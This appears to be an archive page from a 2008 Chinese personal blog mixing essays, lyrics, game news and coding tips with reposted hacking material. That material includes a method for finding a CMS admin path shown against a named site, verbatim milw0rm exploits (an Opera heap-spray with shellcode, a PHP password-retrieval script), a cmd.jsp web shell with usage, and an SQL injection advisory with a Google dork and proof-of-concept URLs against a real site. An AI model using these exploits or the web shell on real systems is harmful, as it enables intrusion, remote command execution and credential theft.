存档

作者存档

动易万能找后台方法

2008年11月18日 没有评论 97 views

提交:

web+region.asp

查源文件,搜'css',你会看到一段





后台:

web+Administrators@#$@#/admin_login.asp

成因:

调用的CSS文件存放在后台目录下,导致利用源代码的查询而获取物理路径.

测试:

网站:http://www.chinatimes.cc/region.asp

搜索css看到的代码:
那么后台地址就是:http://www.chinatimes.cc/hAdminx/admin_login.asp

分类: 技术文章 标签:

身体不是爱情的中转站

2008年11月18日 1 条评论 74 views

曾记得有一个女人说:爱我,请不要以我的身体为中转站。

于是,那些沉寂的身体与爱情之间的战役就被撕开了,青春还没有来得及宣战,爱情就已流血牺牲。抑或,在爱情面前,一切都只能是叹息。

城市里的男男女女有着太多未被标识的灵魂痕迹,它们都会浮于繁华或是沉于安逸。但更多的也只是在理智与冲动中,寻找灵魂深处最原始的发泄。可能每个人都习惯性的有自我保护能力,所以在袒露自我时,也是略带麻木的,这本身就是都市生活给予人们的。

人们不知道拿什么谈爱情,爱情在都市里下落不明,就好像是随时会消失的海市蜃楼。于是,爱情被计算着,情感被较量着,身体夹杂在其中,就好像身陷一场无法言战的斗争。

爱情是什么?我相信爱情的存在,我也相信爱情是美好的,因为我生活在生活中,所以难免会追问爱情的下落,以至于我无法让自己清醒的面对情感,抑或,太过于理性的面对情感。

以前看过一本英国小说,一个男人深爱一个女人,他可以接受她的无理取闹,他努力的成为她喜欢的类型,他时常为了她与别的男人打架,他时常像个木偶般存在她的生活里。她想去旅游,他拿出他不算富裕的银行卡给她;她与别的男人生气,在酒吧里喝的烂醉,他把她抱回去,安静的看着她胡闹,眼里满是疼惜的眼神。

这个女人生性轻浮,跟她暧昧的男人都占有过她的身体。唯独他。

他不要,她不给。

他想要,她不给。

男人可以没有理由的爱一个女人,甘心为她做任何事,男人的爱有时候比女人还细腻。

直到有一天,她觉得自己爱上他了,这种爱是充满罪恶的,因为面对像天使一样的男人,她这个女人就像是魔鬼,且,没有被救赎的可能。

她问他:“你爱我吗?”

他说:“你知道的,我爱你!”

她开始亲吻他,这时候整个城市都要沉睡了,只有他们的欲望是清醒的,仿佛他们都知道自己想要什么,也仿佛他们都觉得过了今夜一切会不同。

事后,她坐在床头吸烟。他说:“我们什么时候结婚?”

她轻轻的笑了笑,说:“亲爱的,你爱我什么?”

他说:“我爱你总不知道疼爱自己,但这样也好,我就有足够的理由去疼爱你;我爱你总是把自己喝得烂醉,但这样也好,我就在机会看你熟睡的像个婴儿般;我爱你总是任性的无理取闹,但这样也好,我就有机会证明我是你身边最能照顾你的男人;我爱你,其实也没有什么原因,只因为那天在路口看到了你,心里浮现的第一个想法就是:这个女孩就是我要爱的。”

她笑了笑,关了灯。她已泪流满面。每个人最疼痛的时候就是心爱的那个人说出的话碰到了自己内心最柔软的地方。

第二天,待他醒来时,她已离开。留下了一张纸条,说:body fuck love.

身体,是情感罪恶的开始,也是爱情清醒的结束。

女人之所以离开,是因为有些爱是爱不起的。在美好面前一切丑陋的东西都浮现了,可能骄傲的离开也算是一种姿态。这种女人内心潜浮着一种罪恶感,当她们在狂乱时,似乎只是在想得到一种欢愉,而当一份纯洁的爱情摆在面前时,她们会退缩。


于是,我在猜想,如果他知道她曾跟过很多男人有染,他会不会还如此犯贱的爱她。男人的脸皮有时候比女人的处女膜还薄。

当我再次回想这篇小说时。我想到了两句话:

身体被挖空了,爱情难免空虚。

身体不是爱情的中转站。

生活里难免会遇一些人打着爱情的名义索要身体。身体好像成为了爱情的中转站。

有些人总觉得得到了一个人的身体,就可以得到一个人的爱情。

有些人总觉得得到了一个人的爱情,就可以得到一个人的身体。

可能幸福只是建立在征服与索取中,而当一切都改变时,谁还会保留着最初的情愫呢?

有些人得到一个人的身体就离开,原因是每个人都对自己得到的东西不知珍惜,仿佛理由是正大光明的。

有些人得不到一个人的身体后就离开,原因是每个人都与自己得不到的东西保持距离,仿佛原因是值得同情的。

我在与我身边的女人交往时,我知道我想要什么,我也清楚他们想要什么。我清楚我在做什么,我也清楚他们在做什么。似乎,这并不能说明什么,只能说我这个人挺可悲的,找不到最原始的纯粹。可是我一直在试探着寻找一份纯粹的爱情。

每个人的生活中都会有一定的时间计划,而我暂时不考虑爱情。一年?二年?时间仅仅只是一个概念。我只是想在某段时间里拥有一个完整的自己。不打扰任何人的生活,不骚扰任何人的情感,不惊动任何人的身体,不路过任何人的灵魂,不触动任何人的心脏。

有时候的离开并非是因为不爱,更多的要能是无法爱,有着太多的原因摆在眼前,它们都是真实存在的,无法跨越,所以就原路折回,人们总是在这种自我折磨里,感觉着生活的无力,与对自我情感的一种摧残。


身体不是爱情的中转站。但都市孩子到一个人的身体比得到一个人的爱情容易,更多的人越来越珍惜一份爱情,而不再珍惜身体。

其实爱情与身体一样的重要,失去任何一样都会让人变得残缺不全。

分类: 心情随笔 标签:

极品飞车12台湾官网上线 Maggie Q访谈视频

2008年11月18日 没有评论 53 views

美商艺电宣布,动作竞速游戏《极品飞车12:无间风云》台湾官网14日上线,提供玩家更多游戏介绍、活动讯息与精彩影片。

  另外,今日也将同步释出 Maggie Q 访谈影片上集。本身即酷爱赛车游戏的 Maggie Q 将在影片与各位分享个人游戏经验与担任《极品飞车12:无间风云》女主角的点滴。


国际巨星 Maggie Q 在《极品飞车12:无间风云》中扮演联邦探员 Chase Linh,她的职责是招募玩家成为卧底警探,以渗透破坏飞车犯罪组织,准备好与 MaggieQ 一同瓦解罪犯了吗?

  《极品飞车12:无间风云》,预定於 11 月 18 日推出 Xbox 360、PS3、NDS、PSP、PC 等多种版本,这也是《极品飞车》系列品牌首度同步於 PC、PS3 与 Xbox 360 三大平台推出中文版游戏。至於 Wii 版本游戏则将於今年稍晚推出。

  此外,美商艺电也将於 11 月 18 日晚间 7 时同步在全省六大指定地点进行 PC 版《极品飞车12:无间风云》首卖活动,於会场独家以优惠价格发售限量《极品飞车12:无间风云》铁盒版。而六大指定地点首位到场排队的玩家,还可得到香港空运回台的《极品飞车12:无间风云》女主角 Maggie Q 亲笔签名限量珍藏海报一幅。

分类: 影音娱乐 标签:

我的爱有罪

2008年11月18日 没有评论 48 views

我的爱有罪

作词:南左
作曲:脑百斤
编曲:脑百斤
演唱:凌飞

感受爱情的滋味
我不知道应该去爱谁
看着你为我流泪
我却又一步步后退

都怪我太过沉醉
没给你一次机会
直到失去了才发现
你的真爱也很美

感受爱情的负累
我不知道怎样去挽回
看着你为我喝醉
我真的无颜去面对

都怪我太过沉醉
一颗心在瞬间崩溃
好想深情地对你说
我并不是无所谓

我的爱有罪
给你无数伤悲
不经意地让你喝醉
有过多少你给我的安慰
一点点把你的甜蜜撕碎

我的爱有罪
让你哭干泪水
不经意地让你憔悴
你还是留下笑容把我陪
我这种男人不值得你追

感受爱情的负累
我不知道怎样去挽回
看着你为我喝醉
我真的无颜去面对

都怪我太过沉醉
没给你一次机会
好想深情地对你说
我并不是无所谓

我的爱有罪
给你无数伤悲
不经意地让你憔悴
有过多少你给我的安慰
一点点把你的甜蜜撕碎

我的爱有罪
让你哭干泪水
每次受尽我无情地责备
你还是留下笑容把我陪
我这种男人不值得你追

我的爱有罪
让你哭干泪水
不经意地让你憔悴
有过多少你给我的安慰
一点点把你的甜蜜撕碎

我的爱有罪
让你哭干泪水
每次受尽我无情地责备
你还是留下笑容把我陪
我这种男人不值得你追

我的爱有罪
让你哭干泪水
不经意地让你憔悴
你还是留下笑容把我陪
我这种男人不值得你追

分类: 影音娱乐 标签:

Opera 9.62 file:// Local Heap Overflow Exploit

2008年11月18日 没有评论 47 views

<html>
<head><title>uh?</title></head>
<body>
<script>

  
  // k`sOSe 11/15/2008
  // tested on Windows XP SP3, opera 9.62 international version
  // vulnerability found by send9

  // there are many ways to achieve code execution, tons of function pointers to overwrite.
  // maybe there's one more reliable...

  var i=0;
  
  // push es, pop es
  var block = unescape("%u0607%u0607"); 

  // metasploit WinExec c:\WINDOWS\system32\calc.exe
  var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");

  while (block.length < 81920) block += block;
  var memory = new Array();
  for (;i<1000;i++) memory[i] += (block + shellcode);


  var evil = "file://";

        for(var i = 0; i<16438; i++)
                evil += "X";

  evil += "R."; 

  window.location.replace(evil);

</script>

</body>
</html>

# milw0rm.com [2008-11-17]

分类: 矩阵毒刺 标签:

FREEze Greetings 1.0 Remote Password Retrieve Exploit

2008年11月18日 没有评论 43 views

<?php

/**
* FREEze Greetings 1.0 Remote Password Retrieve Exploit
* Exploit by cOndemned 
*
* Greetz : suN8Hclf, 0in, m4r1usz, str0ke, rtgn, doctor, sid.psycho [...]
* Special thx to ZaBeaTy for developing such a sexy regexp ;) Thx m8 
*/

echo <<< Header

[~] FREEze Greetings 1.0 Remote Password Retrieve Exploit
[~] Exploit by cOndemned [ Prints decoded admin password ]

Header;

if($argc != 2) printf("[~] Usage : php %s <target_with_path>\r\n\r\n", $argv[0]) and exit;

$out = (preg_match('!^([^ ]+)$!sei', file_get_contents($argv[1] . '/pwd.txt'), $r) && preg_match('!^([^\|\|]+)\|\|!sei', base64_decode($r[1]), $pass))
  ? sprintf("Password : %s", base64_decode($pass[1])) : 'Exploitation failed';

printf("[~] %s \r\n\r\n", $out);

?>

# milw0rm.com [2008-11-17]

分类: 矩阵毒刺 标签:

解决Perl 5.8.8用XML::RSS无法解析非utf-8编码的RSS问题

2008年11月18日 没有评论 229 views

摘要:XML-RSS-1.36是 常用的操作RSS的模块,不过遗憾的是,不支持gb2312,big5等编码的rss文件,操作的话直接报错“Couldn't open encmap gb2312.enc”退出。今天一段代码读baidu的新闻rss 时遇到这个问题,先鄙视一下他用gb2312编码。网上搜索到的解决方案在我这里无效,最终自己比较不优雅的解决了一下。

这个问题发生的原因是XML::RSS模块会调用XML::Parser模块,最终是调用的Perl的核心库Expat,这东西是C写的,不支持gb2312编码。网上搜索到的解决办法如下:

1. Download GB2312.TXT from ftp.unicode.org,事实上这个东西目前下载地址是http://search.cpan.org/src/GUS/Unicode-UTF8simple-1.06/gb2312.txt
2. Download the XML::Encoding 1.01 and get two binaries: make_encmap and compile_encoding,这东西在d:\perl\bin下面,根据的安装目录而有变化。
3. run make_encmap as follows:make_encmap GB2312 GB2312.TXT > GB2312.encmap
4. Add expat='yes' to the first line of GB2312.encmap
5. run compile_encoding: compile_encoding -o GB2312.enc GB2312.encmap
6. copy GB2312.enc to /usr/lib/perl5/site_perl/5.005/i386-linux/XML/Parser/Encoding,windows的话,lib/下面自己去找。

不过遗憾的是,现在这种方法已经不行了,最后在<>中找到原因,如下:

使用 make_enmap 的时候需要改下载来的GB2312.TXT。因为在 GB2312.txt 中,中文编码 0x2121 的应该为 0xa1a1 , 即第一列值全部需要加 0x8080,这样就可以了。修改 make_enmap 给需要处理的地方每个值加 0x80。

不过这样还是太麻烦了,我的做法是直接给XML文件编码一下,代码片段如下:

   1.
      $xml = get( 'http://news.baidu.com/n?cmd=1&class=internet&tn=rss&sub=0' );
   2.
       
   3.
      if( ! defined($xml) )
   4.
      {
   5.
      warn "$!n";
   6.
      return;
   7.
      }
   8.
       
   9.
      if( $xml =~ /s+encoding="(.*?)"/ )
  10.
      {
  11.
      $encode = $1;
  12.
      }
  13.
       
  14.
      if ( &trim($encode) eq "" )
  15.
      {
  16.
      print "No encode found, use utf-8.n";
  17.
      }
  18.
       
  19.
      if( ($encode ne "") && ($encode ne "utf-8") && ($encode ne "UTF-8") )
  20.
      {
  21.
      $xml = decode_utf8( decode( $encode, $xml ) );
  22.
      }
  23.
      $xml =~ s/encoding="(.*?)"/encoding="utf-8"/;
  24.
       
  25.
      my $rss = new XML::RSS;
  26.
      $rss->parse($xml);

先抓取RSS数据,然后查询编码,不是utf-8的话,自己解码再编码到utf-8,并且记得要替换xml文件中的编码申明。

分类: 技术文章 标签:

解决WordPress 2.6日志ID不连续的方法

2008年11月17日 1 条评论 56 views

已经发布的WordPress 2.6版有一个很讨厌的功能,就是Post Revisions(文章的版本控制),在默认的情况下,日志的ID将不再连续,使用ID做为Permalink结构的用户将会看到一个地址越来越混乱的WordPress,现在我给一个解决WordPress的ID不连续的方法。

  按照此文的方法,在wp-config.php文件中增加一行define('WP_POST_REVISIONS', false),同时安装“禁用WordPress自动保存的插件”,在WordPress后台启用此插件。

  请注意这两个操作缺一不可,如果不启用“禁用WordPress自动保存的插件”,那么每篇文章都会出现一个自动保存的记录。

  另外,对于数据库有“洁癖”的WordPress用户来说,可能想要删除由于Post Revisions导致的表内的垃圾信息,同时将ID设置为连续,下面是我写的一段SQL脚本,请在phpmyadmin中使用。

  删除是Post Revisions垃圾信息,请执行:

delete from wp_posts where post_type = 'revision';

  将ID重新设置为连续,这个比较麻烦,设置一个ID就要4条SQL语句,我仅仅举一个例子,将ID为59的文章修改为ID为58,需要执行以下语句。

update wp_posts set id = 58 where id = 59;
update wp_term_relationships set object_id = 58 where object_id = 59;
update wp_postmeta set post_id = 58 where post_id = 59;
update wp_comments set comment_post_ID = 58 where comment_post_ID = 59;

  如果用户需要修改的文章较多,需要批量复制、修改和执行上面四行。

分类: 技术文章 标签:

cmd.jsp 经典版

2008年11月17日 没有评论 124 views

<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>

用法:cmd.jsp?cmd=你要执行的命令

分类: 技术文章 标签:

无线厂商、运营商默认SSID列表

2008年11月17日 没有评论 278 views

TP-link TP-link
D-Link dlink
3COM 3com,comcomcom
linksys linksys
Dell Wireless
NETGEAR NETGEAr,Wireless
SMC SMC,WLAN
Belkin贝尔金 Belkin54g,WLAN
NETCORE NETCORE
Cisco tsunami
intel intel,xlan,101
独立固件 dd-wrt
独立固件 tomato
中国电信 AR7WRD,HG520s
中国移动 CMCC
中国网通 CNC

分类: 资源共享 标签: ,

东楼kappa女视频:一次恶俗而莫名其妙的事件营销

2008年11月17日 没有评论 47 views

11月11日,光棍节。全国笼罩在经济危机与裁员风波的恐慌中,同时东部大部分区域已经进入初冬。在这个许多人需要些许慰藉的日子里,网络带给人们一段黑色幽默:

  在不到20个小时的时间段内,东楼kappa女事件已经传遍了整个网络。据称,事件的主角是上海东楼kappa柜台的营业员,兼职做皮肉生意,这段视频长22分钟,很黄很暴力。下午,谷歌热榜的50个主题词被占用了40个以上,只能用“恐怖”来形容。很多人惊叹:是不是又一次艳照门?

  我们惊叹于搜索和社区传播的威力之余,我们可以进一步感叹:这是一个疯狂的世界!

  网络的推广已经被人类所滥用,“速效”成为每一次活动的最高追求。前天在一次长途的路上,听朋友谈起一种药剂:苗岭洁肤霜,同时具有廉价(20 元1瓶)与高效两大优点,第三个优点让其完美:苗岭的,自然的。该药物对于婴儿奶癣有奇效,一夜之间奶癣全消。很多医生也对此药深信不疑。可是,经临床观察,发现该药导致婴儿性早熟。最快的要是什么?激素!激素绝非天然!所谓苗岭乃是一种包装。

  审视kappa女事件之前,我们思考一下“病毒式营销”的2个关键环节:病毒源、病毒介质。这次事件全然具备,无所不用其极!源与介质除了网络,还有人类心灵的阴暗面----黑暗但无比强大。

  我认为,品牌的营销如果考虑“病毒式”,不妨修改一下“病毒式营销”的定律,加上第三条:目的性。商业需要明确的目的,我们清楚品牌的传播结果有2个:知名度、美誉度。恒源祥恶俗广告“挑战”了人们的极限,三聚氰胺奶粉事件“摧毁”了人们的极限,而这次,kappa女事件乃是“超越”了人们的极限。

  我们试想东楼会找来什么人?一群淫荡流着口水的看客?

  我们试想kappa品牌获得了什么?笑料吧,低端吧?

  从红本女到酷库熊,联想终于学会了事件营销。这次,kappa呢?kappa在全国网民面前跳起一曲钢管舞。

  另:网易、天涯等门户网站最早的报导帖已经被删除。

分类: 影音娱乐 标签:

FloSites Blog Multiple Remote SQL Injection Vulnerabilities

2008年11月17日 没有评论 72 views

===========================================================================================
[-] Title    : Multiple SQL Injection Vulnerability
[-] Software : Flosites Blog
[-] Vendor   : www.flosites.com
[-] Date     : 17 November 2008 (Indonesia)
[-] Author   : Vrs-hCk
[-] Contact  : d00r[at]telkom.net
[-] Blog     : http://c0li.blogspot.com/
===========================================================================================

[+] Google Dork

    "blog by flosites"

[+] Exploit

    http://[site]/[path]/index.php?cat=-1 [SQL]/*
    http://[site]/[path]/index.php?category=-1 [SQL]/*

[+] Proof of Concept

    http://www.designaglow.com/blog/index.php?cat=-1+union+select+1,version(),3/*
    http://www.designaglow.com/blog/index.php?category=-1+union+select+1,version(),3/*

===========================================================================================
[-] Greetz   : 
    www.MainHack.com - www.ServerIsDown.org - #papuahacker crew - #nob0dy Crew @ DALnet
    Paman, NoGe, OoN_Boy, H312Y, pizzyroot, xx_user, bL4Ck_3n91n3, culun_borneo, s3t4n,
    Angela Chang, terbang_melayang, IrcMafia, loqsa, str0ke, em|nem, dkk ...
===========================================================================================

# milw0rm.com [2008-11-16]

分类: 矩阵毒刺 标签: